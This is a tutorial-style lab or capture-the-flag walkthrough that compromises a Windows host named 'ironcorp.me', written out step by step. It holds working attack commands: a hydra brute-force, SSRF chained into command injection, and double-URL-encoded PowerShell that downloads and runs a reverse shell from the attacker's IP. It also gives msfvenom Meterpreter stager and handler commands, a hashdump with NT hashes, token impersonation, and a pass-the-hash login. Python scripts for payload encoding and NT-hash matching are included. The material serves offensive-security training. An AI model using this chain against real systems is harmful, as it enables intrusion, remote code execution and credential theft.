Complex Attack Types: Sample Scenarios


Baris Dincer

In this article of the series we will compromise a target machine in a lab environment, using intelligence gathering and penetration skills, and explain every attack we perform along the way. The aim is to improve your penetration abilities in several areas at once: enumeration, web exploitation, getting a foothold and working around access controls.

You may notice that the IPs change from time to time; do not worry about it, we use different lab machines as we progress. The methodology is the same throughout.

If your keyboard is ready, let’s get started cyberpunks!

First of all, store the values and IPs you use most as shell variables (for example the target address in $target_ip, which the commands below reference), so you do not retype them.

output

Now register the target machine in local name resolution. We will use our /etc/hosts file for this (an entry mapping the target IP to its hostname).

output

That completes the setup. We can move on to enumeration.

We can reveal the open ports, services and operating system of the target machine with nmap: nmap -sV -sC -oN nmap_general_result.txt -T4 -A -Pn -p- --min-rate=300 --max-retries=3 $target_ip

-sV: Service/version detection. Nmap attempts to determine the version of the services running on open ports.
-sC: Runs the default script set against the target, equivalent to --script=default.
-oN nmap_general_result.txt: Writes the results to the file nmap_general_result.txt in normal format.
-Pn: Treats all hosts as online and skips host discovery (useful when ICMP is blocked, as it often is on Windows hosts).
--min-rate=300: Sends at least 300 packets per second.
--max-retries=3: Limits port-scan probe retransmissions to 3.
-p-: Scans all 65535 TCP ports.
-A: Enables OS detection, version detection, script scanning and traceroute (it already covers -sV and -sC; listing them separately is harmless).
-T4: Sets the timing template to level 4 (aggressive).
$target_ip: The shell variable holding the target IP address.

This gives you a comprehensive result, but a full-port scan with version detection takes a while, so be patient. Aggressive timing is fine in a lab; against a production target it is noisy and can trip rate limits or IDS rules.

output
output

As you can see, we have obtained the list of open ports with service details and other notes. In a real engagement, record all of this as you go.

53/tcp open domain
135/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
8080/tcp open http Microsoft IIS httpd 10.0
11025/tcp open http Apache HTTPD 2.4.41
49667/tcp filtered msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

53/tcp open domain:

Service: Domain Name System (DNS)
Description: DNS translates domain names into IP addresses. An open port 53 means the machine runs a DNS server, which for us means zone transfers and dynamic updates are worth testing.
Security Note: A DNS server should restrict zone transfers and dynamic updates to trusted hosts and must not be an open resolver, to avoid data leakage, spoofing and amplification attacks.

135/tcp open msrpc Microsoft Windows RPC:

Service: Microsoft RPC endpoint mapper (Remote Procedure Call)
Description: Used for remote management and communication between Windows components; RPC underpins many Windows services. Port 135 hands clients the dynamic ports (49152 and up) on which individual RPC services listen.
Security Note: Vulnerabilities in RPC services have historically been exploited. Keep the host patched and do not expose RPC beyond the networks that need it.

3389/tcp open ms-wbt-server Microsoft Terminal Services:

Service: Remote Desktop Protocol (RDP)
Description: Provides remote access to the desktop of a Windows computer, used for remote administration and support.
Security Note: RDP should require strong passwords and multi-factor authentication, and access should be restricted (VPN or allow-listed sources). Exposed RDP is a common ransomware entry point, both through vulnerabilities and through credential stuffing.

8080/tcp open http Microsoft IIS httpd 10.0:

Service: HTTP (web service)
Description: 8080 is commonly used as an alternative web port. Here it is served by Microsoft IIS (Internet Information Services) 10.0.
Security Note: Keep the web server patched and configured securely, and prefer HTTPS for any authenticated traffic.

11025/tcp open http Apache HTTPD 2.4.41:

Service: HTTP (web service)
Description: A second, separate web server on the same host, Apache HTTP Server 2.4.41. This is the port the admin and internal virtual hosts below are served on, so it is the one hydra and curl target later.
Security Note: Keep Apache updated and configured securely, and prefer HTTPS for authenticated traffic.

49667/tcp filtered msrpc Microsoft Windows RPC:

Service: Microsoft RPC (dynamic port)
Description: "filtered" means nmap got no response (or an ICMP unreachable) for this port, so a firewall or host filter is blocking the probe rather than the service answering.
Security Note: Verify what this port is for and whether it should be reachable at all. Filtering shows that some filtering is in place, but it is partial, since neighbouring RPC ports are open.

49670/tcp open msrpc Microsoft Windows RPC:

Service: Microsoft RPC (dynamic port)
Description: Another RPC service listening on a dynamic port handed out via the endpoint mapper on 135.
Security Note: Ensure all RPC services are patched and restrict access to the IP addresses that need them.

Before moving on, you can run a targeted nmap scan against just these ports with the vulnerability script category: nmap -p 53,135,3389,8080,11025,49667,49670 --script=vuln -A -T4 -sV $target_ip -oN nmap_spec_result.txt (the vuln category is slow and noisy, and some of its scripts send exploit-like probes, so use it deliberately).

output
output
output

Now take a good look at the nmap output for the two HTTP servers. The http scripts list paths and endpoints that the hosts expose, some of which should not be reachable without authentication. We will enumerate these pages another way in a moment.

The DNS port is open, so we need to enumerate it. Start by requesting a zone transfer for the domain we registered in /etc/hosts: dig axfr @10.10.126.48 ironcorp.me

axfr: The query type for a full zone transfer (RFC 5936). A zone transfer is how secondary name servers replicate a zone; if the server answers an AXFR request from an arbitrary client, we retrieve the entire zone, including every hostname and record defined for the domain.

output

As you can see, the zone transfer succeeded and revealed additional hostnames (including the admin and internal hosts we use below). Add each of them to your /etc/hosts file, pointing at the target IP, so that the virtual hosts resolve.

output

You can also check whether a zone transfer is possible with nmap if you need to: nmap --script=dns-zone-transfer --script-args dns-zone-transfer.domain=ironcorp.me -p 53 $target_ip -Pn (the script needs the domain name as an argument when the target is given as an IP).

output

Now let's be a little sneaky and run an alternative check: does the server accept unauthenticated dynamic updates? Try adding a TXT record with nsupdate.

Use it:

nsupdate
> server 10.10.126.48
> update add test.ironcorp.me 5 TXT "HELLO WORLD"
> send
output

Now verify it. We will use nslookup for this.

Use it:

nslookup
> server 10.10.126.48
Default server: 10.10.126.48
Address: 10.10.126.48#53
> set type=txt
> test.ironcorp.me
output

Yes, the TXT record was accepted: the server allows dynamic updates from unauthenticated clients (no TSIG key or allow-update restriction). Save this and add it to your list for later. It may let us add a record in the zone that points a hostname at our own IP.

The admin page (admin.ironcorp.me on port 11025, found through the zone transfer) is protected by HTTP Basic authentication, so it asks for a username and password. We can try a brute-force against it: hydra -l admin -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/best1050.txt -s 11025 admin.ironcorp.me http-get

-l admin fixes the username, -P supplies the password list, -s sets the port, and the http-get module sends each guess as a Basic Authorization header for the path / (add the path as a final argument if the protected page lives elsewhere).

Don't be surprised: many administrators never change the default username…

output

We got the password.

Now we can log in to the panel.

output

We are in now.

Now it's time to review the page. Feel free to use your browser's developer tools. It is worth recording values such as the session ID and cookies.

output

The search input is built naively: whatever you type is passed as the r= query parameter. Take note of "?r=".

output

Check the "Storage" tab.

output

Nothing in storage. Check the "Network" tab; it may reveal endpoints.

output

Nothing there either. Keep going.

output

Save any information you get from here.

Try typing something in the “Search” section.

output

Yes, the format is as we expected: ?r=hello+world#

Now we can run some interesting experiments. Try to fetch "https://google.com" through it.

output

No error, but the request keeps spinning: the server appears to be fetching the URL itself rather than the browser (and it hangs, most likely because the target cannot reach the internet). So what happens if we ask for a file? Try any file URL on the internet.

output

We got an error, but the error message refers to the URL scheme we supplied, which confirms the server is parsing and requesting the value of r= on our behalf.

So the parameter is fetched server-side. In other words, we can make the server request hosts that are only reachable from inside its network. Try internal.ironcorp.me now.

output

Yes! We got this.

So what is “here”?

output

Look at the URL: we were redirected to the internal host, which we cannot reach directly. We can reach it again through the admin page's r= parameter. Note that.

output

Yes, our theory holds. Save this name: Equinox.

So, can we make the server fetch a file from our own machine? Try it.

First start your own HTTP server (it serves the current directory on port 8000): python3 -m http.server

output

Now create a random file.

output

Let's try to fetch our file through the admin page we have captured, and watch the http.server log for the incoming GET.

output

Very exciting: the target fetched a file from our server, so it makes server-side requests to hosts we control as well as to internal ones. Our attack surface is growing considerably. Note that too.

Now some detail: what we have found is a Server-Side Request Forgery (SSRF) vulnerability. SSRF is a web vulnerability that lets an attacker induce the server-side application to make HTTP requests to a destination of the attacker's choosing, including hosts and services that are only reachable from the server itself. Depending on what those internal services do, the impact ranges from information disclosure and access to internal applications up to remote code execution.

When you examine the response headers, one of them states the PHP version. That is a lead for exploit research.

output
output
output

Always evaluate what is exposed here.

Now let's see whether we can turn this into RCE. Remote Code Execution (RCE) is a vulnerability class that lets an attacker run arbitrary code on a remote system. It typically means full control of the compromised host, with data theft, system damage and further movement across the network as the consequences.

Try it.

output

The internal page takes a name parameter (name.php?name=...) and echoes it after the text "Equinox". Now let's manipulate that value a little.

output

Did you see? The value is passed to a shell unsanitised: appending |whoami ran the command, and the output tells us the web server runs as nt authority\system.

Now we can move this to curl.

Note that:

GET /?r=http://internal.ironcorp.me:11025/name.php?name=test|whoami HTTP/1.1
Host: admin.ironcorp.me:11025
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Check the "Authorization: Basic YWRtaW46cGFzc3dvcmQxMjM=" header.

output

This is the Basic authentication header: base64 of username:password, which is the admin credential we brute-forced (decode it with echo ... | base64 -d). Basic auth is only as safe as the transport, and here it travels over plain HTTP.

Use it with curl: curl --user admin:**** 'http://admin.ironcorp.me:11025/?r=http://internal.ironcorp.me:11025/name.php?name=test|whoami'

output

We are in a Windows environment; let's gather more information. Use curl --user admin:**** 'http://admin.ironcorp.me:11025/?r=http://internal.ironcorp.me:11025/name.php?name=test|systeminfo'

output

We can run any command we want…

Time to sail into more dangerous waters: a reverse shell.

First, download the following script to your local machine (the commands below serve it under the name power_tcp.ps1): https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

output

We started our HTTP server earlier; if it is no longer running, start it again in the directory holding the script.

Now we need to make the target run the following, which downloads the script from our server and executes it in memory: powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.7.103:8000/power_tcp.ps1')

The command has to be URL-encoded, and it passes through two URL parsers: admin.ironcorp.me decodes the r= parameter once, then internal.ironcorp.me decodes the name= parameter again. A single layer of encoding is undone by the first hop, and the raw spaces, quotes and parentheses then break the forwarded URL. Use https://www.urlencoder.org/ if you need a tool.

powershell.exe%20-c%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A%2F%2F10.10.7.103%3A8000%2Fpower_tcp.ps1%27%29

If the single-encoded form doesn't work, encode it twice: the first decode then leaves a still-encoded command that survives in the forwarded request, and the second decode hands the shell the real command. A few lines of Python do it.

import urllib.parse

# The command to run on the target (replace the IP and port with your listener's).
command = "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.7.103:8000/power_tcp.ps1')"
# First layer: undone by admin.ironcorp.me when it parses r=.
encoded_command = urllib.parse.quote(command, safe="")
# Second layer: undone by internal.ironcorp.me when it parses name=.
double_encoded = urllib.parse.quote(encoded_command, safe="")
print(encoded_command)
print("\n\n")
print(double_encoded)
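To see why one layer of encoding fails and two succeed, here is an added example (not code from the original article) that models the two hops as ordinary URL decoders: the admin page reads r= from its query string, forwards the result as a request to the internal host, and name.php reads name= and hands what follows the pipe to a shell. Hostnames, parameters and the command are the ones used above; the parsing behaviour of the two PHP pages is an assumption modelled on a standard decoder. Unlike Burp, which percent-encodes every character (hence the %25%37%30 strings later on), urllib leaves letters alone; both forms decode to the same thing.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Values from the article. The hop behaviour below is a model, not the target's source.
ADMIN = "http://admin.ironcorp.me:11025/?r="
INTERNAL = "http://internal.ironcorp.me:11025/name.php?name=test|"
CMD = ("powershell.exe -c iex(new-object net.webclient)"
       ".downloadstring('http://10.10.7.103:8000/power_tcp.ps1')")


def encode(value: str, levels: int) -> str:
    """Percent-encode every non-alphanumeric byte, `levels` times over."""
    for _ in range(levels):
        value = quote(value, safe="")
    return value


def build_request(cmd: str, levels: int) -> str:
    """The URL we send to the admin page. Only the command is encoded; the
    inner URL stays literal so its ?name= still parses after the first hop."""
    return ADMIN + INTERNAL + encode(cmd, levels)


def first_hop(outer_url: str) -> str:
    """admin page: read r= from the query string (one level of URL decoding)."""
    return parse_qs(urlsplit(outer_url).query)["r"][0]


def is_valid_request_target(url: str) -> bool:
    """An HTTP request-target may not contain whitespace or control characters;
    a server receiving one answers 400, or the client refuses to send it."""
    return all(0x21 <= ord(ch) <= 0x7E for ch in url)


def second_hop(inner_url: str) -> str:
    """internal name.php: read name= (second level of decoding) and return
    what follows the pipe, which is what the shell would execute."""
    name = parse_qs(urlsplit(inner_url).query)["name"][0]
    return name.split("|", 1)[1]


def deliver(cmd: str, levels: int):
    """Run the chain. Returns the command that reaches the shell, or None when
    the request the admin page would forward is malformed."""
    inner = first_hop(build_request(cmd, levels))
    if not is_valid_request_target(inner):
        return None
    return second_hop(inner)


if __name__ == "__main__":
    print("single-encoded ->", deliver(CMD, 1))   # None: spaces leak into hop 2's request line
    print("double-encoded ->", deliver(CMD, 2))   # the original command
    print(build_request(CMD, 2))                  # what to paste into Burp / curl
```

The same model explains the later failure with the Burp-encoded payload: anything that must survive N URL parsers needs N layers of encoding on the way in.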

output

You can also do the encoding in Burp.

Let's try the single-encoded version first.

output

It failed: the target rejected the request because of the URL format (the first hop decoded our payload and forwarded raw spaces and quotes).

Open Burp now.

output

URL-encode the command (Decoder, "Encode as URL", all characters), then encode the result again.

output

We have:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%64%25%36%33%25%32%30%25%36%39%25%36%35%25%37%38%25%32%38%25%36%65%25%36%35%25%37%37%25%32%64%25%36%66%25%36%32%25%36%61%25%36%35%25%36%33%25%37%34%25%32%30%25%36%65%25%36%35%25%37%34%25%32%65%25%37%37%25%36%35%25%36%32%25%36%33%25%36%63%25%36%39%25%36%35%25%36%65%25%37%34%25%32%39%25%32%65%25%36%34%25%36%66%25%37%37%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%38%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%31%25%33%30%25%32%65%25%33%31%25%33%30%25%32%65%25%33%37%25%32%65%25%33%31%25%33%30%25%33%33%25%33%61%25%33%38%25%33%30%25%33%30%25%33%30%25%32%66%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31%25%32%37%25%32%39
output

Forward it.

output

Yes! The request went through: the target fetched power_tcp.ps1 from our HTTP server (the http.server log shows the GET). Note that iex(downloadstring(...)) runs the script in memory; it does not write a file to the target's disk.

Now we need to make the shell actually start: the script defines the function but nothing has called it yet. Time to encode:

powershell.exe ./power_tcp.ps1 -Reverse -IPAddress 10.10.7.103 -Port 11011

We have:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%65%25%32%66%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31%25%32%30%25%32%64%25%35%32%25%36%35%25%37%36%25%36%35%25%37%32%25%37%33%25%36%35%25%32%30%25%32%64%25%34%39%25%35%30%25%34%31%25%36%34%25%36%34%25%37%32%25%36%35%25%37%33%25%37%33%25%32%30%25%33%31%25%33%30%25%32%65%25%33%31%25%33%30%25%32%65%25%33%37%25%32%65%25%33%31%25%33%30%25%33%33%25%32%30%25%32%64%25%35%30%25%36%66%25%37%32%25%37%34%25%32%30%25%33%31%25%33%31%25%33%30%25%33%31%25%33%31

Before forwarding this, put your machine in listening mode on the port you specified: nc -nlvp 11011

output

PowerShell's execution policy (not the firewall) may refuse to run .ps1 files directly.

So you may need to bypass it when invoking the script (this, like the previous attempt, assumes the script exists on the target's disk):

powershell.exe -noprofile -executionpolicy bypass -file .\power_tcp.ps1

Encode it first.

We have:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%64%25%36%65%25%36%66%25%37%30%25%37%32%25%36%66%25%36%36%25%36%39%25%36%63%25%36%35%25%32%30%25%32%64%25%36%35%25%37%38%25%36%35%25%36%33%25%37%35%25%37%34%25%36%39%25%36%66%25%36%65%25%37%30%25%36%66%25%36%63%25%36%39%25%36%33%25%37%39%25%32%30%25%36%32%25%37%39%25%37%30%25%36%31%25%37%33%25%37%33%25%32%30%25%32%64%25%36%36%25%36%39%25%36%63%25%36%35%25%32%30%25%32%65%25%35%63%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31

Send it.

output

Now send the main payload again:

%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%36%35%25%37%38%25%36%35%25%32%30%25%32%65%25%32%66%25%37%30%25%36%66%25%37%37%25%36%35%25%37%32%25%35%66%25%37%34%25%36%33%25%37%30%25%32%65%25%37%30%25%37%33%25%33%31%25%32%30%25%32%64%25%35%32%25%36%35%25%37%36%25%36%35%25%37%32%25%37%33%25%36%35%25%32%30%25%32%64%25%34%39%25%35%30%25%34%31%25%36%34%25%36%34%25%37%32%25%36%35%25%37%33%25%37%33%25%32%30%25%33%31%25%33%30%25%32%65%25%33%31%25%33%30%25%32%65%25%33%37%25%32%65%25%33%31%25%33%30%25%33%33%25%32%30%25%32%64%25%35%30%25%36%66%25%37%32%25%37%34%25%32%30%25%33%31%25%33%31%25%33%30%25%33%31%25%33%31

If this doesn't work (and with an in-memory download there is no file on the target for the commands above to run), append the call that starts the shell to the end of the script you serve, so it runs as soon as the script is loaded. For this nishang script the documented invocation is Invoke-PowerShellTcp -Reverse -IPAddress 10.10.7.103 -Port 11011, with your own IP and listener port.

output

Then send the iex(downloadstring(...)) request again.

output

We got our reverse shell!

output

Check the privilege level (whoami).

output

Yeap!

Now let's look at the other users.

output

There is a SuperAdmin user, and even our SYSTEM shell gets "permission denied" on that user's directory.

So at this stage we need a way around that access control.

Check the permissions on the SuperAdmin directory: get-acl C:\Users\SuperAdmin | fl

output

Path: The path of the object whose ACL is displayed.

Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\SuperAdmin

Owner: The owner of the directory.

Owner : NT AUTHORITY\SYSTEM

Group: The primary group of the directory.

Group : NT AUTHORITY\SYSTEM

Access: The access control entries (ACEs) for the directory, listing the permissions granted or denied to users and groups.

Access : BUILTIN\Administrators Deny FullControl
S-1-5-21-297466380-2647629429-287235700-1000 Allow FullControl

The BUILTIN\Administrators group is explicitly denied FullControl. Deny ACEs are evaluated before Allow ACEs, and the LocalSystem token carries the Administrators group, which is why our SYSTEM shell was refused. The principal with SID S-1-5-21-297466380-2647629429-287235700-1000 (unresolved to a name here; RID 1000 is typically the first local account created) is allowed FullControl. So the way in is to act under a token that is not subject to the Deny ACE.

Time for some slyness. First, check whether we can access the Administrator user's directory.

output

Yes, we have access there, as expected.

Now let's build a Meterpreter payload on our machine and transfer it over. The psh format produces a PowerShell script that embeds the stager:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.7.103 LPORT=12011 -f psh -o meterpreter_64.ps1
output

Now start the handler in Metasploit, with the same payload, host and port (ExitOnSession false keeps it listening after the first session):

msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.7.103; set lport 12011; set ExitOnSession false; exploit -j"
output

Now transfer it to the target and run it. Check that your HTTP server is still active and that the file name matches what you serve.

powershell -command "& { iwr 10.10.7.103:8000/meterpreter_64.ps1 -OutFile C:\Users\Administrator\Desktop\meterpreter_64.ps1 }"

Run it.

output

Load the PowerShell script from that location:

Import-Module .\meterpreter_64.ps1
output

Yeap! The handler reports a session, and we have it.

Interact with the session now (sessions -i <id>).

output

Your abilities speak here. Run the hashdump command in Meterpreter.

output

Did you see?

Each line follows this pattern:

<username>:<RID>:<LM-hash>:<NTLM-hash>:::

<username>: Username of the account.
<RID>: Relative Identifier of the account (500 is always the built-in Administrator, 501 Guest, 503 DefaultAccount; 1000 and up are created accounts).
<LM-hash>: LM hash of the account's password (empty, or aad3b435b51404eeaad3b435b51404ee, means no LM hash is stored, which is the default on modern Windows).
<NTLM-hash>: NT hash of the account's password.
:::: End-of-entry marker.

From the dump:

Admin: RID 1003, NTLM hash: 25f46396c818314f78cafba3fd1e5596
Administrator: RID 500, NTLM hash: 2182eed0101516d0a206b98c579565e6
DefaultAccount: RID 503, NTLM hash: 31d6cfe0d16ae931b73c59d7e0c089c0
Equinox: RID 1001, NTLM hash: e40d1ba38afa3fe8264af701b7ca9b7c
Guest: RID 501, NTLM hash: 31d6cfe0d16ae931b73c59d7e0c089c0
Sunlight: RID 1002, NTLM hash: d54b9ad80935dd57769e8eae3e655927

31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password, so DefaultAccount and Guest have no password set (both are normally disabled).

NT hashes are what NTLM authentication in Windows actually uses, and because the protocol proves possession of the hash rather than the password, a stolen NT hash can be replayed directly (pass-the-hash) without cracking it.
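To make the format and the empty-password point concrete, here is an added example (not code from the original article) that computes NT hashes from scratch (MD4 over the UTF-16LE password, with MD4 implemented inline because OpenSSL 3 no longer ships it by default), parses hashdump lines and flags accounts whose hash is that of the empty password. The sample dump is constructed from the usernames, RIDs and NT hashes listed above, with the no-LM marker filled in; the LM fields are an assumption.

```python
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: the primitive behind the NT hash."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"              # padding: 1 bit, zeros, 64-bit LE length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, shift cycle, word order)
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        state = [a0, b0, c0, d0]
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = state
                a = _rotl((a + func(b, c, d) + x[k] + const) & _MASK, shifts[i % 4])
                state = [d, a, b, c]             # rotate roles: next step updates old d
        a0, b0, c0, d0 = ((v + w) & _MASK for v, w in zip((a0, b0, c0, d0), state))
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex encoded as hashdump prints it."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = nt_hash("")                          # 31d6cfe0d16ae931b73c59d7e0c089c0

# Constructed from the hashes in the article; LM fields are assumed to be the no-LM marker.
SAMPLE_DUMP = """
Admin:1003:aad3b435b51404eeaad3b435b51404ee:25f46396c818314f78cafba3fd1e5596:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0a206b98c579565e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Equinox:1001:aad3b435b51404eeaad3b435b51404ee:e40d1ba38afa3fe8264af701b7ca9b7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Sunlight:1002:aad3b435b51404eeaad3b435b51404ee:d54b9ad80935dd57769e8eae3e655927:::
"""


def parse_hashdump(text: str) -> list:
    """Parse pwdump-style lines; flag stored LM hashes and empty NT passwords."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        rows.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_stored": lm.lower() not in ("", EMPTY_LM),
            "empty_password": nt.lower() == EMPTY_NT,
        })
    return rows


def match_candidates(rows: list, candidates: list) -> dict:
    """Return {user: password} for accounts whose NT hash equals a guessed password."""
    table = {nt_hash(p): p for p in candidates}
    return {r["user"]: table[r["nt"]] for r in rows if r["nt"] in table}


if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_DUMP)
    for r in rows:
        note = "  <- empty password" if r["empty_password"] else ""
        print(f"{r['user']:15} RID {r['rid']:<5} NT {r['nt']}{note}")
    print(match_candidates(rows, ["", "Password1"]))
```

The NT field alone is what pass-the-hash tools take (the -H argument to evil-winrm below, for instance), so an NT hash from a dump like this is usable the moment you have it; cracking is only needed when you want the cleartext for a service that does not speak NTLM.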

Now load the incognito extension in Meterpreter (load incognito; older versions use use incognito), then list the user tokens available on the host: list_tokens -u

output

Impersonate the Admin user's token, so that the ACEs on the SuperAdmin directory are evaluated against a different identity: impersonate_token "WIN-8VMBKF3G815\Admin"

output

We are moving on to the final stage. Drop to a command shell with shell.

output

We got it!

One more alternative. With the NT hashes in hand you can also authenticate directly by pass-the-hash, no cracking required: evil-winrm -i 10.10.230.120 -u <USER_NAME> -H <NTLM_HASH>

This needs WinRM (5985/5986) to be reachable and the account to be allowed to use it; our scan of this host showed no WinRM port, so it may not apply here. If possible…

Don’t give up on hacking.

Code for good.

^-^
